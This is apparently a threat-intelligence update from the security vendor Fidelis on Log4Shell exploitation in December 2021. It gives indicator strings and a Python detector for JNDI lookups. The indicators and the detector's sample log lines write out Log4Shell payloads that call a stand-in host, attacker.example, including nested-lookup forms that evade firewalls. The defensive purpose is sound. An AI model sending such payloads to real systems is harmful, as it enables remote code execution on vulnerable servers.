Adam has over 12 years of collective intelligence experience – with 8 years in Cyber Threat Intelligence (CTI) distributed across various disciplines which include: incident response, malware analysis,...
Latest Threat Activity and Fidelis Response
Key Developments | 17 December 2021
Multiple high-fidelity sources continue to report that cyber threat actors of varying skill and motivation are exploiting this vulnerability either to deliver their primary payload (e.g., cryptocurrency-mining malware) or to establish initial access into the victim environment (e.g., Cobalt Strike), which will almost certainly lead to further intrusion chains of varying sophistication. While we have yet to directly observe Cobalt Strike use, the Fidelis Threat Research Team (TRT) has observed an extremely large volume of Linux/Unix command shell injection in the week since the disclosure of the Log4Shell vulnerability.
Cryptocurrency Miners
Figure 1. Log4Shell exploitation attempts from actors most likely deploying cryptocurrency miners – source: Fidelis Telemetry
Figure 2. Log4Shell exploitation attempts from actors most likely deploying cryptocurrency miners – image credit: BleepingComputer
Command Shell Injection
Figure 3. Command shell injections following Log4Shell, using WGET – source: Fidelis Telemetry
Figure 4. Command shell injections following Log4Shell, using CURL – source: Fidelis Telemetry
Fidelis Response
Fidelis TRT continues to enhance our detection logic, primarily through direct collection and analysis of live attack telemetry data, and through broader observations gained from industry partnerships and vetted open-source intelligence.
Figure 5. Fidelis dynamic detection alert firing on WAF evasion (HTTP User-Agent) for Log4Shell – source: Fidelis Telemetry
Indicators
Network Relevant Strings
${jndi:ldap://badguyFQDN[OR]IPv4/*malicious_content*}
${jndi:ldap://badguyFQDN[OR]IPv4/Basic//*maliciousbase64_content*}
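The WAF-evasion detection shown in Figure 5 and the network strings above both come down to recognizing a JNDI lookup even when the literal "jndi" has been split across nested Log4j lookups. The following is an added example, not Fidelis code: it collapses the common ${lower:x} and ${::-x} nesting back to plain text, then matches the ${jndi:<protocol>: shape over constructed access-log lines. The domain attacker.example and all log lines are constructed for illustration.

```python
import re

# Constructed access-log lines (client, request, status, referer, user-agent); not real telemetry.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/Basic/Zm9v}"',
    '203.0.113.11 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
    '203.0.113.13 - - "GET /?q=${env:HOME} HTTP/1.1" 200 "-" "curl/7.68.0"',
]

# Nested lookups used to break up the literal "jndi" so that a plain substring
# filter on the User-Agent misses it. Each one evaluates to its default value.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")                    # ${::-j} -> j
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)   # ${lower:J} -> j


def normalize(text: str) -> str:
    """Repeatedly collapse inner lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
    return text


# After normalization a lookup has the shape ${jndi:<protocol>:... seen in the strings above.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return (line_number, protocol, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize(line)
        match = JNDI_PATTERN.search(normalized)
        if match:
            hits.append((number, match.group(1).lower(), normalized))
    return hits


if __name__ == "__main__":
    for number, protocol, normalized in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi via {protocol}: {normalized}")
```

Line 5 carries a non-JNDI lookup (${env:HOME}) and is deliberately not flagged, so the check keys on the JNDI protocol prefix rather than on any ${...} string.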